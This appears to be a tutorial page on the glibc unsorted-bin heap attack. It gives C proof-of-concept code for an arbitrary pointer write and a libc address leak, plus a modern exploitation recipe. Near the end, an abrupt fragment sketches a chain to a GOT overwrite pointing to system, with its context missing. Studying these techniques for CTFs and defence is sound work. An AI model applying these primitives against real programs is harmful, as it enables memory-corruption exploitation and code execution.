Unsorted-bin processing writes the address of `unsorted_chunks(av)` through the `bk` pointer of a chunk. Therefore, if an attacker can **modify the `bk` pointer** of a chunk inside the unsorted bin, they may be able to **write that address to an arbitrary address**, which can be helpful to leak Glibc addresses or bypass some defenses.
So, basically, this attack allows you to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A traditional target was **`global_max_fast`**, to allow creating fast bins of bigger sizes (and pivot from an unsorted bin attack to a fast bin attack).
- Modern note (glibc ≥ 2.39): `global_max_fast` became an 8-bit global. Blindly writing a pointer there via an unsorted-bin write will clobber adjacent libc data and will no longer reliably raise the fastbin limit. Prefer other targets or other primitives when running against glibc 2.39+. See "Modern constraints" below and consider combining with other techniques like a [large bin attack](large-bin-attack.md) or a [fast bin attack](fast-bin-attack.md) once you have a stable primitive.
> [!TIP]
> Taking a look at the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid the tcache), it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough to not end up in the tcache, you can see that the previously mentioned error appears, preventing this technique: **`malloc(): unsorted double linked list corrupted`**
### How the write actually happens
- The unsorted-bin write is actually triggered on `malloc`, when the allocator scans the unsorted bin and takes the corrupted chunk off the list.
- During that removal, the allocator performs (simplified): `victim = unsorted_chunks(av)->bk; bck = victim->bk; unsorted_chunks(av)->bk = bck; bck->fd = unsorted_chunks(av);`
- If you can set `victim->bk` to `(mchunkptr)(TARGET - 0x10)` while the chunk sits in the unsorted bin, the last statement performs the write: `*(TARGET) = unsorted_chunks(av)`, a pointer into `main_arena` and therefore a very large value.
- Since glibc 2.28, integrity checks run before that unlink: `bck->fd == victim` and `victim->fd == unsorted_chunks(av)`. Because `bck = TARGET - 0x10`, the first check dereferences your target, so `*(TARGET)` must already equal the `victim` pointer or the allocator aborts with `malloc(): unsorted double linked list corrupted`. See the sketch below.
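To make this concrete, here is a minimal sketch in the spirit of how2heap's `unsorted_bin_attack`. It only runs to completion on older glibc (< 2.28), where the integrity checks above are absent; `target` is a hypothetical stand-in for the variable you want to stamp with a big value:

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
    uint64_t target = 0;            // stand-in for e.g. global_max_fast

    // Large enough to avoid tcache/fastbins so free() goes to the unsorted bin.
    uint64_t *victim = malloc(0x420);
    malloc(0x20);                   // guard: prevents consolidation with top

    free(victim);                   // victim is now the only unsorted chunk

    // Relative to the user pointer, fd is victim[0] and bk is victim[1].
    // Point bk at TARGET - 0x10 so that bck->fd overlaps &target.
    victim[1] = (uint64_t)&target - 0x10;

    // The next scan of the unsorted bin runs (simplified):
    //   bck = victim->bk; unsorted_chunks(av)->bk = bck;
    //   bck->fd = unsorted_chunks(av);   // i.e. *(&target) = main_arena ptr
    malloc(0x420);

    printf("target = %#lx\n", target);  // a huge libc address on glibc < 2.28
    return 0;
}
```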
## Modern constraints (glibc ≥ 2.33)
To use unsorted-bin writes reliably on current glibc:
- Tcache interference: for sizes that fall into tcache, frees are diverted there and won't touch the unsorted bin. Either:
  - make requests with sizes > MAX_TCACHE_SIZE (≥ 0x410 on 64-bit by default), or
  - fill the corresponding tcache bin (7 entries) so that additional frees reach the global bins (see the sketch after this list), or
  - if the environment is controllable, disable tcache (e.g., `GLIBC_TUNABLES=glibc.malloc.tcache_count=0`).
- Integrity checks on the unsorted list: on the allocation path that examines the unsorted bin, glibc checks (simplified):
  - `bck->fd == victim` and `victim->fd == unsorted_chunks(av)`; otherwise it aborts with `malloc(): unsorted double linked list corrupted`.
  - This means the check itself dereferences your `TARGET`: `bck->fd` is `*(TARGET)`, and it must hold the exact `victim` pointer for the unlink, and thus the write `*(TARGET) = unsorted_chunks(av)`, to go through. Choose targets where this precondition can be arranged, or where simply forcing a large non-zero value is useful.
- Typical stable targets in modern exploits
  - Application or global state that treats "large" values as flags/limits.
  - Indirect primitives (e.g., set up for a subsequent [fast bin attack]({{#ref}}fast-bin-attack.md{{#endref}}) or to pivot into a later write-what-where).
  - Avoid `__malloc_hook`/`__free_hook` on new glibc: they were removed in 2.34. Avoid `global_max_fast` on ≥ 2.39 (see next note).
- About `global_max_fast` on recent glibc
  - On glibc 2.39+, `global_max_fast` is an 8-bit global. The classic trick of writing a heap pointer into it (to enlarge fastbins) no longer works cleanly and is likely to corrupt adjacent allocator state. Prefer other strategies.
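As referenced in the tcache bullet above, a minimal sketch of the fill pattern (assuming the default `tcache_count` of 7 on 64-bit; the sizes are illustrative):

```c
#include <stdlib.h>

int main(void) {
    void *filler[7];
    void *victim = malloc(0x100);   // tcache-range size (0x110 chunk)
    malloc(0x20);                   // guard against consolidation with top

    for (int i = 0; i < 7; i++)     // 7 chunks of the same size...
        filler[i] = malloc(0x100);
    for (int i = 0; i < 7; i++)
        free(filler[i]);            // ...fill the 0x110 tcache bin completely

    // The bin is full and 0x110 is above the default fastbin limit (0x80),
    // so this free lands in the unsorted bin instead of the tcache.
    free(victim);
    return 0;
}
```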
## Minimal exploitation recipe (modern glibc)
Goal: achieve a single arbitrary write of a large libc pointer (`unsorted_chunks(av)`) to an arbitrary address using the unsorted-bin removal primitive, without crashing.

- Layout/grooming
  - Allocate A, B, C with sizes large enough to bypass tcache (e.g., 0x5000). C prevents consolidation with the top chunk.
- Free
  - `free(B)`, so B sits in the unsorted bin with its `fd`/`bk` pointing at the bin head.
- Corruption
  - Overflow from A into the freed B to set `B->bk = (mchunkptr)(TARGET - 0x10)`.
- Trigger
  - Request an allocation that makes the allocator process the unsorted bin (e.g., a `malloc` of B's size). When B is unlinked, the allocator executes `bck->fd = unsorted_chunks(av)`, therefore `*(TARGET) = unsorted_chunks(av)`.
- Continuation
  - On glibc ≥ 2.28 the integrity check `bck->fd == victim` runs first, so `*(TARGET)` must already contain the pointer to B or the process aborts. The written value is a large libc address, which may be enough to change size/limit semantics in targets that only check for "big".
Pseudocode skeleton:
```c
// 64-bit, glibc 2.35–2.38 style layout (tcache bypass via large sizes)
void *A = malloc(0x5000);
void *B = malloc(0x5000);
void *C = malloc(0x5000); // guard: keeps B away from the top chunk

free(B);                  // B goes into the unsorted bin (fd/bk -> bin head)

// Overflow from A (or a UAF) into the freed B. Relative to the user
// pointer, fd is at B+0x0 and bk is at B+0x8.
*(size_t *)((char *)B + 0x8) = (size_t)TARGET - 0x10; // write fake bk

malloc(0x5000);           // unlink of B executes *(TARGET) = unsorted_chunks(av)
```
> [!NOTE]
> • If you cannot bypass tcache with size, fill the tcache bin for the chosen size (7 frees) before freeing the corrupted chunk so the free reaches the unsorted bin.
> • If the program aborts on the allocation that processes the unsorted bin, re-examine that `victim->fd` still equals the bin head and that `*(TARGET)` (i.e., `bck->fd`) holds the exact `victim` pointer when the integrity check runs.
## Unsorted Bin Infoleak Attack
This is actually a very basic concept. The chunks in the unsorted bin contain pointers: the first chunk in the unsorted bin will actually have its **`fd`** and **`bk`** links **pointing to a part of the main arena (Glibc)**.
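A minimal sketch of the idea, assuming a dangling pointer lets you read the freed chunk (the exact offset into `main_arena` is build-specific):

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
    uint64_t *a = malloc(0x420);  // beyond tcache range
    malloc(0x20);                 // guard so free(a) doesn't merge with top

    free(a);                      // a -> unsorted bin; fd/bk point into main_arena

    // Use-after-free read: a[0] (the fd field) now leaks a libc pointer.
    uint64_t leak = a[0];
    printf("leaked main_arena pointer: %#lx\n", leak);
    // libc base = leak - (build-specific offset of the unsorted bin head)
    return 0;
}
```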
Then C was deallocated and consolidated with A+B (but B was still in use).
- Overwrite `global_max_fast` using an Unsorted Bin attack (works 1 in 16 times due to ASLR, because we only need to modify 12 bits, but we must modify 16 bits).
- Fast Bin attack to modify a global array of chunks. This gives an arbitrary read/write primitive, which allows modifying the GOT and setting some function to point to `system`.
## References
- Glibc malloc unsorted-bin integrity checks (example in 2.33 source): https://elixir.bootlin.com/glibc/glibc-2.33/source/malloc/malloc.c
- `global_max_fast` and related definitions in modern glibc (2.39): https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c
{{#include ../../banners/hacktricks-training.md}}